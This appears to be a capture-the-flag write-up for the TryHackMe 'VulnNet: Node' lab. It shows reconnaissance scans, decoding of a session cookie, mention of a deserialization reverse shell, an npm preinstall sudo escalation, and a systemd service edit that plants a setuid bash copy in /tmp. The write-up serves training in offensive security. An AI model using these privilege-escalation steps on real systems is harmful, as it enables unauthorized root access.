VulnNet: Node
VulnNet Entertainment has moved its infrastructure and now they're confident that no breach will happen again. You're tasked to prove otherwise and penetrate their network.
Last updated
VulnNet Entertainment has moved its infrastructure and now they're confident that no breach will happen again. You're tasked to prove otherwise and penetrate their network.
Last updated
mkdir ~/Documents/tryhackme/vulnnet
cd ~/Documents/tryhackme/vulnnet
mkdir recon enumeration notes
touch notes/{README.md,vuln,notes}
export IP=10.10.34.89First of all, I scan the machine for open ports. I used rustscan to do that because it is faster than nmap and I can choose same options.
rustscan -a $IP --ulimit 5000 -- -sC -sV -A -T4 I've discovered that only port 8080 is open, indicating an HTTP service likely running on the Node.js framework in the background. Let's explore the website to uncover its contents. Typically, my initial step involves running a Nikto command, as it provides comprehensive insights but may take some time. In this time, I manually scan the website for default pages like robots.txt or sitemap.xml, aiming to find potentially interesting information such as user data, email addresses, or domain details.
nikto --host $URL -C all -o recon/nikto.txt After this, I proceeded with fuzzing; however, even after changing the wordlist, I did not find any results.
feroxbuster -t 10 -u http://$IP -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o enumeration/feroxbusterIn login page I tried some SQLinjection, but without results. At this step I was stuck, but after minutes I remember that I forget to check the cookie. It was in base64 encoding.
echo 'eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ=='| base64 -dSo this cookie seems to be exploitable. After I google it I found a few interesting blogs who explains very well how it works.
I used the script found in the blog above and customize it to get a reverse shell.
Initially, I conducted user enumeration to determine available permissions. It was revealed that I had the capability to execute npm commands as another user. Consulting GTFobins, I sought methods to gain access as the "serve-manage" user.
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
chmod 777 $TF
sudo -u serv-manage /usr/bin/npm -C $TF --unsafe-perm iThe user.txt flag can be found in home directory of serve-manage user. Now let's get root privilege.
I found that I can run system service as root, but before that needs to change the content of the vulnnet-auto.timer and vulnnet-job.service file.
vulnnet-auto.timer
[Unit]
Description=Run VulnNet utilities every 30 min
[Timer]
OnBootSec=0min
# 30 min job
OnCalendar=*:0/1
Unit=vulnnet-job.service
[Install]
WantedBy=basic.targetvulnnet-job.timer
[Unit]
Description=Logs system statistics to the systemd journal
Wants=vulnnet-auto.timer
[Service]
# Gather system statistics
Type=forking
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/privesc;chmod +xs /tmp/privesc'
[Install]
WantedBy=multi-user.targetexecute commands
sudo /bin/systemctl stop vulnnet-auto.timer
sudo /bin/systemctl daemon-reload
sudo /bin/systemctl start vulnnet-auto.timer
